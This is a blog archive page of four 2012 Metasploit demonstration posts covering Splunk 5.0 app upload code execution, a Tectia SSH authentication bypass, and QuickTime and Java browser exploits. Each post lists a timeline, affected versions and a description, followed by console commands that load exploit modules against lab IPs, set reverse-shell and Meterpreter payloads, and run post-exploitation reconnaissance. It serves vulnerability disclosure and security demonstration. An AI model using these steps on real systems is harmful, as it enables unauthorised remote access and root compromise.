Category Archives: Metasploit

All my posts regarding Metasploit framework, auxiliaries, plugins and exploits.

Splunk 5.0 Custom App Remote Code Execution Metasploit Demo

09/12/2012Exploits, MetasploitSplunkwow

Timeline :

Vulnerability discovered by Marc Wickenden
Vulnerability details provided by Marc Wickenden the 2012-11-12
Metasploit PoC provided by Marc Wickenden the 2012-11-14

PoC provided by :

@marcwickenden
sinn3r
juan vazquez

Reference(s) :

Splunk: With Great Power Comes Great Responsibility
Abusing Splunk Functionality with Metasploit

Affected version(s) :

All Splunk 5.x versions

Tested on Centos 5.8 x86 with :

Splunk version 5.0.1, build 143156

Description :

This module exploits a feature of Splunk whereby a custom application can be uploaded through the web based interface. Through the script search command a user can call commands defined in their custom application which includes arbitrary perl or python code. To abuse this behavior, a valid Splunk user with the admin role is required. By default, this module uses the credential of admin:changeme, the default Administrator credential for Splunk. Note that the Splunk web interface runs as SYSTEM on Windows, or as root on Linux by default. This module has only been tested successfully against Splunk 5.0.

Commands :

use exploit/multi/http/splunk_upload_app_exec
set RHOST 192.168.178.34
set TARGET 0
set PAYLOAD cmd/unix/reverse_perl
set LHOST 192.168.178.26
exploit

ifconfig
id
uname -a
ps

Tectia SSH Server Authentication Bypass Metasploit Demo

04/12/2012Exploits, MetasploitSSH, Tectiawow

Timeline :

Vulnerability discovered by @kingcope
Vulnerability disclosed by @kingcope the 2012-12-01
Metasploit PoC the 2012-12-04

PoC provided by :

kingcope
bperry
sinn3r

Reference(s) :

Full Disclosure
Tectia Support

Affected version(s) :

SSH Tectia Server 6.0.4 to 6.0.20
SSH Tectia Server 6.1.0 to 6.1.12
SSH Tectia Server 6.2.0 to 6.2.5
SSH Tectia Server 6.3.0 to 6.3.2

Tested on Centos 5.8 x86 with :

SSH Tectia Server 6.3.2-33

Description :

This module exploits a vulnerability in Tectia SSH server for Unix-based platforms. The bug is caused by a SSH2_MSG_USERAUTH_PASSWD_CHANGEREQ request before password authentication, allowing any remote user to bypass the login routine, and then gain access as root.

Commands :

use exploit/unix/ssh/tectia_passwd_changereq
set RHOST 192.168.178.34
set PAYLOAD cmd/unix/interact
exploit

id
uname -a
/sbin/ifconfig

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

02/12/2012Exploits, MetasploitApple, CVE-2012-3752, QuickTimewow

Timeline :

Vulnerability reported to vendor by Arezou Hosseinzad-Amirkhizi
Coordinate public release of the vulnerability the 2012-11-05
Metasploit PoC provided by juan vazquez the 2012-11-22

PoC provided by :

Arezou Hosseinzad-Amirkhizi
juan vazquez

Reference(s) :

CVE-2012-3752
OSVDB-87087
BID-56557
HT5581

Affected version(s) :

QuickTime 7.7.2 and earlier for Windows

Tested on Windows XP Pro SP3 with :

QuickTime 7.7.2
Firefox 3.5.1

Description :

This module exploits a vulnerability found in Apple QuickTime. When handling a TeXML file, it is possible to trigger a stack-based buffer overflow, and then gain arbitrary code execution under the context of the user. This is due to the QuickTime3GPP.gtx component not handling certain Style subfields properly, as the font-table field, which is used to trigger the overflow in this module. Because of QuickTime restrictions when handling font-table fields, only 0x31-0x39 bytes can be used to overflow, so at the moment DEP/ASLR bypass hasn’t been provided. The module has been tested successfully on IE6 and IE7 browsers (Windows XP and Vista).

Commands :

use exploit/windows/browser/apple_quicktime_texml_font_table
set SRVHOST 192.168.178.26
set TARGET 3
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

12/11/2012Exploits, MetasploitJava, Oraclewow

Timeline :

Vulnerability patched by Oracle in 2012 October CPU
Vulnerability discovered exploited in the wild by @kafeine the 2012-11-09
Metasploit PoC provided by juan vazquez the 2012-11-11

PoC provided by :

Unknown
juan vazquez

Reference(s) :

CVE-2012-5076
OSVDB-86363
BID-56054
Oracle October 2012 CPU
Cool EK : “Hello my friend…”

Affected version(s) :

Java 1.7.0_07-b10 and earlier

Tested on Windows XP Pro SP3 with :

Java 1.7.0_07-b10

Description :

This module abuses the JAX-WS classes from a Java Applet to run arbitrary Java code outside of the sandbox as exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier.

Commands :

use exploit/multi/browser/java_jre17_jaxws
set SRVHOST 192.168.178.26
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.26
exploit

sessions -i 1

getuid
sysinfo

Eric Romang Blog

aka wow on ZATAZ.com

Category Archives: Metasploit

Splunk 5.0 Custom App Remote Code Execution Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Centos 5.8 x86 with :

Description :

Commands :

Tectia SSH Server Authentication Bypass Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Centos 5.8 x86 with :

Description :

Commands :

CVE-2012-3752 Apple QuickTime TeXML Vulnerability Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP Pro SP3 with :

Description :

Commands :

CVE-2012-5076 Java Applet JAX-WS Remote Code Execution Metasploit Demo

Timeline :

PoC provided by :

Reference(s) :

Affected version(s) :

Tested on Windows XP Pro SP3 with :

Description :

Commands :